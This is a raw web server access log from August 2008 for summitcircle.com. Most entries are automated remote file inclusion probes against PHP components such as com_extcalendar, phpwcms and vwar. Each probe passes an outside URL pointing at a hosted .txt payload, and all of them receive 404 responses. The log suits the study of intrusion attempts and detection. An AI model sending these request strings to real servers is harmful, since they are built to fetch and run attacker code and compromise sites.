195.93.200.219 - - [03/Aug/2008:18:15:49 -0700] "GET /logs/access_080210.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:15:49 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:15:54 -0700] "GET /logs/access_080210.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:15:55 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:15:55 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:16:01 -0700] "GET /logs/access_080121.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.185.237.77 - - [03/Aug/2008:18:16:09 -0700] "GET /logs//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:16:19 -0700] "GET /logs/access_080121.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:16:33 -0700] "GET /logs/access_080121.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:18:17:16 -0700] "GET /logs/access_070813.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:18:17:16 -0700] "GET /logs/access_070813.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.111.172.23 - - [03/Aug/2008:18:17:37 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [03/Aug/2008:18:17:37 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [03/Aug/2008:18:17:39 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [03/Aug/2008:18:17:39 -0700] "GET /logs/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [03/Aug/2008:18:17:40 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [03/Aug/2008:18:17:40 -0700] "GET /components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:18:50 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:18:51 -0700] "GET /logs/access_070917.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:18:51 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:18:52 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
84.246.21.243 - - [03/Aug/2008:18:18:54 -0700] "GET /magazine.php?inc=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:19:29 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:20:07 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:20:07 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:20:07 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:20:07 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:20:30 -0700] "GET /logs/access_080210.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [03/Aug/2008:18:20:50 -0700] "GET /components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
89.111.172.23 - - [03/Aug/2008:18:20:50 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
89.111.172.23 - - [03/Aug/2008:18:20:50 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
62.231.161.4 - - [03/Aug/2008:18:21:30 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:18:21:30 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:18:21:30 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:18:21:30 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:18:21:34 -0700] "GET /logs/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
62.231.161.4 - - [03/Aug/2008:18:21:34 -0700] "GET /components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:18:21:50 -0700] "GET /logs/access_070813.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:18:22:44 -0700] "GET /logs/access_071112.log/index2.php?c=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:18:22:44 -0700] "GET /logs/index2.php?c=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:18:22:44 -0700] "GET /index2.php?c=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
67.15.186.5 - - [03/Aug/2008:18:23:02 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
67.15.186.5 - - [03/Aug/2008:18:23:02 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
219.117.239.114 - - [03/Aug/2008:18:23:31 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.desperate-souls.com/raid/docs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
219.117.239.114 - - [03/Aug/2008:18:23:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.desperate-souls.com/raid/docs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
84.246.21.243 - - [03/Aug/2008:18:24:23 -0700] "GET /magazine.php?inc=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:24:56 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:24:56 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:24:56 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:18:24:56 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:26:52 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:26:52 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:26:52 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.93.200.219 - - [03/Aug/2008:18:26:52 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.6.18.230 - - [03/Aug/2008:18:27:01 -0700] "GET /logs/access.log HTTP/1.0" 200 88673 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "summitcircle.com"
213.168.176.11 - - [03/Aug/2008:18:28:51 -0700] "GET /logs/access_071231.log/index.php?menu=http://www.cmc-clan.de/page/vwar/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
213.168.176.11 - - [03/Aug/2008:18:28:51 -0700] "GET /index.php?menu=http://www.cmc-clan.de/page/vwar/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
213.168.176.11 - - [03/Aug/2008:18:28:51 -0700] "GET /logs/index.php?menu=http://www.cmc-clan.de/page/vwar/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
193.239.211.19 - - [03/Aug/2008:18:30:14 -0700] "GET /logs/access.log/index.php?body=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:18:30:14 -0700] "GET /index.php?body=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:18:30:14 -0700] "GET /logs/index.php?body=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:18:30:15 -0700] "GET /logs/access_071008.log/index.php?body=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:30:32 -0700] "GET /logs/access_071021.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:30:32 -0700] "GET /logs/access_071021.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:30:32 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:30:33 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:30:33 -0700] "GET /logs/access_071021.log/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:30:33 -0700] "GET /logs/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:30:37 -0700] "GET /logs/scripts.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:30:37 -0700] "GET /logs/scripts.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
217.172.161.101 - - [03/Aug/2008:18:30:38 -0700] "GET /logs/scripts.log/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:30:50 -0700] "GET /logs/access.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:30:50 -0700] "GET /logs/access.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:30:50 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:30:50 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
213.168.176.11 - - [03/Aug/2008:18:30:52 -0700] "GET /logs/access_070813.log/index.php?menu=http://www.cmc-clan.de/page/vwar/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.168.176.11 - - [03/Aug/2008:18:30:52 -0700] "GET /index.php?menu=http://www.cmc-clan.de/page/vwar/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.168.176.11 - - [03/Aug/2008:18:30:52 -0700] "GET /logs/index.php?menu=http://www.cmc-clan.de/page/vwar/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:18:30:53 -0700] "GET /logs/access_071112.log/index2.php?c=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:18:30:53 -0700] "GET /logs/index2.php?c=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:30:54 -0700] "GET /logs/access.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:30:54 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:30:56 -0700] "GET /logs/access.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:30:57 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:18:30:58 -0700] "GET /index2.php?c=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:18:31:29 -0700] "GET /logs/index2.php?c=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.111.176.106 - - [03/Aug/2008:18:31:33 -0700] "GET /logs/access_070813.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:18:31:34 -0700] "GET /logs/access_071112.log/index2.php?c=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:18:31:34 -0700] "GET /index2.php?c=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:18:34:03 -0700] "GET /index.php?id=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:18:34:03 -0700] "GET /logs/index.php?id=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:18:34:03 -0700] "GET /logs/access_070820.log/index.php?id=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:18:34:58 -0700] "GET /logs/access_070917.log/home.php?file=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:18:34:58 -0700] "GET /home.php?file=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:18:34:58 -0700] "GET /logs/home.php?file=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
89.140.72.25 - - [03/Aug/2008:18:35:38 -0700] "GET /logs/access_080616.log/index1.php?id=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.140.72.25 - - [03/Aug/2008:18:35:38 -0700] "GET /logs/index1.php?id=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.140.72.25 - - [03/Aug/2008:18:35:42 -0700] "GET /index1.php?id=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:18:36:34 -0700] "GET /logs/access_070813.log/index.php?id=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:18:38:13 -0700] "GET /logs/home.php?file=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:18:38:13 -0700] "GET /logs/access_070917.log/home.php?file=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:18:38:13 -0700] "GET /home.php?file=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.11.67.10 - - [03/Aug/2008:18:38:17 -0700] "GET /logs/access_071119.log HTTP/1.1" 404 275 "-" "wnga hrivhnsljywv y odlilgva bejgl" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:38:31 -0700] "GET /logs/access_071112.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:38:34 -0700] "GET /logs/access_071112.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:38:36 -0700] "GET /logs/access_071112.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.97.0.11 - - [03/Aug/2008:18:38:37 -0700] "GET /logs/access_071112.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:18:38:44 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:18:38:45 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
